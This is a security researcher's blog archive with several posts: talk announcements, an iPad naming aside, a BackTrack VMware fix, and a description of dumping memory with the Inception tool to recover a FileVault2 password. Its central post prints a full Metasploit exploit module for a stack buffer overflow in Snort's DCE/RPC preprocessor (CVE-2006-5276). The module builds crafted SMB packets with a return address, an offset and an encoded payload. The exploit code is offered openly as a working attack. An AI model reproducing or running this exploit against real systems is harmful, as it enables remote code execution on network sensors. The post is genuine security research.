Posted by & filed under /dev/random, Hacking & Pentesting.

I spoke at the OWASP NY/NJ chapter meeting yesterday, and it was great fun. The presentation is available here.

Some people asked me after the presentation for links to the tools I demonstrated, so here goes:

Looking forward to the next meeting!

Posted by & filed under /dev/random.

I’ll speak at the OWASP NYC Chapter at Bank of New York Mellon this Thursday, check the link for getting on the waiting list (at the time of writing, the meeting is fully booked).

I’ll speak about hardware hacks (not lock picking, but rather how to use hardware to attack software), and present my tool Inception among other things. I think it will be an entertaining talk, and hopefully raise the awareness about hardware-level attacks on software systems. See you there!

Posted by & filed under Hacks, Tools & Methodology.

I’ve recently had some time on my hands (knee injury), so I decided to implement a couple of Metasploit modules.

This first module allows remote attackers to execute arbitrary code by exploiting the Snort service via crafted SMB traffic. The vulnerability is due to a boundary error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests, which may result a stack-based buffer overflow with a specially crafted packet sent on a network that is monitored by Snort 2.6.1 (yes, this is an old vulnerability):

# $Id$

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Capture
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
      'Name' => 'Stack-based buffer overflow in the DCE/RPC preprocessor in Snort',
      'Description' => %q{
        This module allows remote attackers to execute arbitrary code exploiting
        the Snort service via crafted SMB traffic. The vulnerability is caused 
        due to a boundary error within the DCE/RPC preprocessor when reassembling
        SMB Write AndX requests. This can be exploited to cause a stack-based
        buffer overflow via a specially crafted packet sent on a network that
        is monitored by Snort.

        Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS
        4.1, 4.5 and 4.6.

        Any host on the Snort network may be used as the remote host. The remote
        host does not need to be running the SMB service for the exploit to be

        Original discovery by Neel Mehta, IBM Internet Security Systems X-Force.
      'Author' => [ 'Carsten Maartmann-Moe ' ],
      'License' => MSF_LICENSE,
      'Version' => '$Revision$',
      'Platform' => 'win',
      'References' =>
          [ 'OSVDB', '67988' ],
          [ 'CVE', 'CVE-2006-5276' ],
          [ 'URL', '' ]
          'EXITFUNC' => 'thread',
      'Payload' =>
          'Space' => 390,
          'BadChars' => "\x00",
          'DisableNops' => true,
      'Targets' =>
          [ 'Windows Universal',
              'Ret' => 0x00407c01, # JMP ESP snort.exe
              'Offset' => 289  # The number of bytes before overwrite
      'Privileged' => true,
      'DisclosureDate'=> 'Feb 19 2007',
      'DefaultTarget' => 0))

        Opt::RPORT(139),'RHOST', [ true,  'A host on the Snort-monitored network' ]),'SHOST', [ false, 'The (potentially spoofed) source address',
                                  nil ])
      ], self.class)


  def exploit

    shost = datastore['SHOST'] || Rex::Socket.source_address(rhost)

    p = buildpacket(shost, rhost, rport.to_i)

    print_status("Sending crafted SMB packet from #{shost} to #{rhost}:#{rport}...")

    capture_sendto(p, rhost)


  def buildpacket(shost, rhost, rport)
    p =
    p.ip_saddr = shost
    p.ip_daddr = rhost
    p.tcp_dport = rport
    p.tcp_flags.psh = 1
    p.tcp_flags.ack = 1

    # SMB packet borrowed from

    # NetBIOS Session Service, value is the number of bytes in the TCP segment,
    # must be greater than the total size of the payload. Statically set.
    header = "\x00\x00\xde\xad"

    # SMB Header
    header << "\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8\x00\x00"
    header << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
    header << "\x00\x08\x30\x00"

    # Tree Connect AndX Request
    header << "\x04\xa2\x00\x52\x00\x08\x00\x01\x00\x27\x00\x00"
    header << "\x5c\x00\x5c\x00\x49\x00\x4e\x00\x53\x00\x2d\x00\x4b\x00\x49\x00"
    header << "\x52\x00\x41\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00"
    header << "\x3f\x3f\x3f\x3f\x3f\x00"

    # NT Create AndX Request
    header << "\x18\x2f\x00\x96\x00\x00\x0e\x00\x16\x00\x00\x00\x00\x00\x00\x00"
    header << "\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    header << "\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x40\x00\x02\x00\x00\x00"
    header << "\x01\x11\x00\x00\x5c\x00\x73\x00\x72\x00\x76\x00\x73\x00\x76\x00"
    header << "\x63\x00\x00\x00"

    # Write AndX Request #1
    header << "\x0e\x2f\x00\xfe\x00\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
    header << "\x00\x48\x00\x00\x00\x48\x00\xb6\x00\x00\x00\x00\x00\x49\x00\xee"
    header << "\x05\x00\x0b\x03\x10\x00\x00\x00\xff\x01\x00\x00\x01\x00\x00\x00"
    header << "\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
    header << "\xc8\x4f\x32\x4b\x70\x16\xd3\x01\x12\x78\x5a\x47\xbf\x6e\xe1\x88"
    header << "\x03\x00\x00\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
    header << "\x2b\x10\x48\x60\x02\x00\x00\x00"

    # Write AndX Request #2
    header << "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
    header << "\x00\x48\x00\x00\x00\xff\x01"

    tail = "\x00\x00\x00\x00\x49\x00\xee"

    # Return address
    eip = [target['Ret']].pack('V')

    # Sploit
    sploit = make_nops(10)
    sploit << payload.encoded

    # Padding (to pass size check)
    sploit << make_nops(1)

    # The size to be included in Write AndX Request #2, including sploit payload
    requestsize = [(sploit.size() + target['Offset'])].pack('v')

    # Assemble the parts into one package
    p.payload = header << requestsize << tail << eip << sploit


The module was recently accepted into the framework. Download Metasploit from github.

Posted by & filed under /dev/random.

WSJ ran a rather lengthy article yesterday about Apples newest tablet, the iPad 3.

One of the things that struck me was the paragraph treating the new name of the iPad:

Apple didn’t provide much explanation for its decision not to use a specific name—such as the much-rumored iPad 3 handle–which some branding experts said could confuse purchasers. Mr. Schiller simply said that Apple broke from the convention “because we don’t want to be predictable.”

What’s in a name, right?

But by giving the iPad the name the new iPad, Apple implicitly says that all other models of the iPad are the “old iPad”. This may seem like a bad idea at first, ousting loyal customers by degrading their devices from “iPad 2″ to just plain “old”.

But from a marketing perspective, the new name makes perfect sense. It creates a natural desire to own the new product; if it isn’t the new iPad you own, it must be the old iPad. No one wants to own old devices. And there’s a solution to that, and that is paying a visit to the Apple Store.

This is not a blunder by Apple, it’s a marketing spin taken straight out of Don Draper’s notebook.

Maybe the guys in Cupertino have spent the last months recapping the seasons of Mad Men before the show reopens later this month. And maybe those “branding experts” mentioned in the WSJ article should, too.

Posted by & filed under /dev/random, Tools & Methodology.

Even though the official release date is not until March 1st, I upgraded BackTrack 5 to R2 today following this excellent guide.

But after the full upgrade I found that VMware Workstation was not working. Ah, the fun of being an early adopter. Time to patch and recompile the sources  (thanks to Weltall for providing the patch).

Open a terminal, and enter the following commands:

cd /tmp
tar vxzf vmware802fixlinux320.tar.gz

Voila. You should now be able to start VMware Workstation. Now update VMware tools in your VMware virtual machines, and you should be ready to go. Happy hacking!

Posted by & filed under Hacking & Pentesting, Hacks, Tools & Methodology.

I’ve created a short video showing how to attack OS X Lion with FileVault2 enabled using my tool, Inception.

In the video, I attack a fully patched Mac OS X Lion machine with full-disk encryption enabled (FileVault2), while the machine is powered on and a user is logged in. Using Inception, I am able to dump the memory of the target, and use strings and grep to find the FileVault2 password.

If you are curious to understand ho this works, see my post from a couple a weeks ago, or download the tool and try for yourself.

I’m sorry about the low quality, my media codec-fu is apparently weak today… I’ll post more videos showcasing other features of Inception soon. Stay tuned!